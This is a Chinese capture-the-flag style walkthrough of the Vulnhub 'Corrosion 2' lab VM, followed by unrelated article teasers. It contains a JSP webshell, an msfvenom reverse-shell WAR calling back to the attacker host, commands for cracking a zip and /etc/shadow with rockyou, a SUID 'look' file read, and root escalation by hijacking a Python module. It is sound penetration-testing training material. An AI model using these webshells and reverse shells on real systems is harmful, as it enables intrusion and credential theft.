Vulnhub靶机:Corrosion 2

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:corrosion:2(10.0.2.13)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/

二、信息收集

使用nmap主机发现靶机ip10.0.2.13

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、8080

在这里插入图片描述

80端口:打开是一个apache2的默认页面,查看源码和目录爆破都没有发现可利用的点

在这里插入图片描述

8080端口:打开网站是tomcat后台登录页面,tomcat版本为9.0.53,使用dirsearch进行目录爆破,发现存在backup.zip备份文件和readme.txt文件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

将备份文件下载,进行解压,发现需要密码。使用fcrackzip工具进行暴力破解,得到密码:@administrator_hi5

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip 

在这里插入图片描述
在这里插入图片描述

将备份文件解压,在tomcat-users.xml文件里发现tomcat后台的用户名和密码

在这里插入图片描述
在这里插入图片描述

三、漏洞利用

登录到后台后可以通过部署war包进行getshell,将war包上传,部署,可以看到应用列表已经出现了我们的目录

# cmd.jsp
<%if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>#生成war包
jar cvf cmd.war cmd.jsp

在这里插入图片描述

在这里插入图片描述

访问一下/cmd/目录会返回404,但直接访问/cmd/cmd.jsp可以访问成功,执行命令id返回命令执行结果

http://10.0.2.13:8080/cmd/cmd.jsp?pwd=023&i=id

在这里插入图片描述

反弹shell,尝试过很多方法都失败了,怀疑是不是木马的问题,这次使用msfvenom生成war木马反弹shell,反弹成功

msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.2.15" LPORT=4444 -f war > cmdmsf.war                

在这里插入图片描述

在这里插入图片描述

使用python获取交互shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

查看具有root权限的文件,发现policykit-1/polkit-agent-helper-1,可以使用经典的本地提权漏洞cve-2021-4034,但发现靶机没有gcc环境,尝试在本地进行编译,再上传到靶机进行执行,但总是出现各种各样的问题,放弃。

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

查看/etc/passwd 中可存在的用户,发现jaye和randy用户

cat /etc/passwd | grep "/bin/bash"
cat /etc/passwd | grep "/bin/sh"

在这里插入图片描述

尝试一下切换成 jaye 用户,密码还是用刚才发现的 Tomcat 密码

在这里插入图片描述

在/home/randy文件夹下发现note.txt文件,文件里说更改了 randy 对主目录的权限,不能进行删除和添加

在这里插入图片描述

在/home/jaye/Flies目录下,存在look文件,是系统的look命令,look命令可以越权访问

LFILE=file_to_read
./look '' "$LFILE"

在这里插入图片描述

在这里插入图片描述

/etc/shadow文件和/etc/passwd文件复制下来,保存到本地,使用unshadow命令创建1个含有用户名和密码详细信息的文件

unshadow passwd shadow > pass.txt

john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。破解时间取决于密码的复杂程度以及破解模式。使用john工具进行破解。爆出来两个用户:jaye\melehifokivai randy\07051986randy

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

使用randy的用户密码登录ssh

在这里插入图片描述

使用命令sudo -l查看可以执行的root权限的命令

/usr/bin/python3.8 /home/randy/randombase64.py

在这里插入图片描述

查看randombase64.py文件的内容,发现该文件调用了base64模块,并且尝试修改该文件,发现没有修改权限

在这里插入图片描述

在这里插入图片描述

想到调用了base64模块,是不是可以修改base64模块来达到提权的目的。发现base64模块可编辑

在这里插入图片描述

修改base64模块

在这里插入图片描述

执行命令运行randombase64.py,获取root权限

在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:Vulnhub 靶场 CORROSION: 2 - sainet - 博客园 (cnblogs.com)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/338362.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

常用服务器管理面板整理汇总

服务器管理面板是用于管理和控制服务器的软件&#xff0c;可以帮助管理员更轻松地进行服务器管理和维护。以下是几种常用的服务器管理面板&#xff1a; 1、宝塔面板【官网直达】 宝塔面板是一款服务器运维管理软件&#xff0c;支持Windows和Linux等操作系统&#xff0c;提供了…

你猜不到的2024年!特斯拉首席预言家马斯克,发表预言惹社交平台沸腾,2024年真的...

埃隆马斯克&#xff0c;特斯拉首席执行官&#xff0c;一向以其独特的见解和预测而备受瞩目。最新消息显示&#xff0c;他对2024年的预测让人瞠目结舌&#xff0c;称2024将比过去四年更加“疯狂”。 就在2024年刚刚来临的时候&#xff0c;有人在社交平台上发问&#xff0c;希望…

在Vue表格里写入一个缩略图,并且点击缩略图时,弹出窗口会显示对应的大图

成果图展示&#xff1a; 点击缩略图之后&#xff1a;右上角或者点击幕布之外都可以关闭 template 部分代码展示 这段代码拿去可以直接运行&#xff0c;记得图片路径改成自己的&#xff01; <template><div><el-table :data"tableData"><el-…

Jmeter+ant+Jenkins 接口自动化框架完整版

接口自动化测试单有脚本是不够的&#xff0c;我们还需要批量跑指定接口&#xff0c;生成接口运行报告&#xff0c;定位报错接口&#xff0c;接口定时任务&#xff0c;邮件通知等功能。批量跑指定接口&#xff1a;我们可以利用ant批量跑指定目录下的Jmeter脚本生成接口运行报告&…

Vert.x学习笔记-什么是事件总线

广义事件总线介绍Vert.x的事件总线Vert.x的事件总线的实现方式Vert.x的事件总线通信模式事件总线与消息队列的区别点对点通信模式请求-应答通信模式发布-订阅通信模式 Vert.x的事件总线应用场景Vert.x的事件总线消息Vert.x的事件总线消息示例Vert.x的事件总线的消息类型 拓展 广…

STM32入门教程-2023版【3-4】按键控制制LED

关注 点赞 不错过精彩内容 大家好&#xff0c;我是硬核王同学&#xff0c;最近在做免费的嵌入式知识分享&#xff0c;帮助对嵌入式感兴趣的同学学习嵌入式、做项目、找工作! 这篇文章以项目代码的形式实现GPIO输入 一、按键控制LED &#xff08;1&#xff09;搭建面包板电…

SAP SMARTFORMS 打印表换行

表单打印自动换行&#xff0c;值的拼接 cl_abap_char_utilities>cr_lfSMARTFORMS 设置 程序传值处理 TYPES: BEGIN OF ty_c, zm_zd TYPE char25, END OF ty_c. DATA: lt_ty1 TYPE TABLE OF ty_c, lt_ty2 TYPE TABLE OF ty_c, ls_t…

51-6 Vision Transformer ,ViT 论文精读

李沐&#xff08;沐神&#xff09;、朱毅讲得真的好&#xff0c;干货蛮多&#xff0c;值得认真读很多遍&#xff0c;甚至可以当成多模态大模型基础课程学习。 论文原文: An image is worth 16x16 words: transformers for image recognition at scale。 ViT取代了CNN&#xf…

特征工程:图像数据不足时的处理办法

在机器学习中&#xff0c;绝大部分模型都需要大量的数据进行训练和学习&#xff08;包括有监督学习和无监督学习&#xff09;&#xff0c;然而在实际应用中经常会遇到训练数据不足的问题。比如图像分类&#xff0c;作为计算机视觉最基本的任务之一&#xff0c;其目标是将每幅图…

KazooClient出现【句柄无效】错误

报错信息&#xff1b; Connection dropped: socket connection error: 句柄无效。 Connection dropped: socket connection error: 句柄无效。 Connection dropped: socket connection error: 句柄无效。 Connection dropped: socket connection error: 句柄无效。 Connection …

electron自定义窗口和右键菜单样式

前言 electron默认沿用系统UI&#xff0c;并没有提供很多接口供使用者定制样式&#xff0c;如果想要完全自定义的样式&#xff0c;目前我能想到的方案只能是通过前端自定义样式&#xff0c;然后通过进程通信来实现系统基础功能&#xff1a;最大/小化、关闭、拖动窗口等。 效果…

22、Kubernetes核心技术 - 整合Rancher通过界面管理k8s集群

目录 一、概述 二、Rancher API Server 的功能 2.1、授权和角色权限控制 2.2、使用 Kubernetes 的功能 2.3、配置云端基础信息 2.4、查看集群信息 三、Rancher 安装 3.1、前置环境 3.2、通过 Docker 来进行安装Rancher 3.3、在 Rancher 的界面上绑定k8s集群 3.4、在 …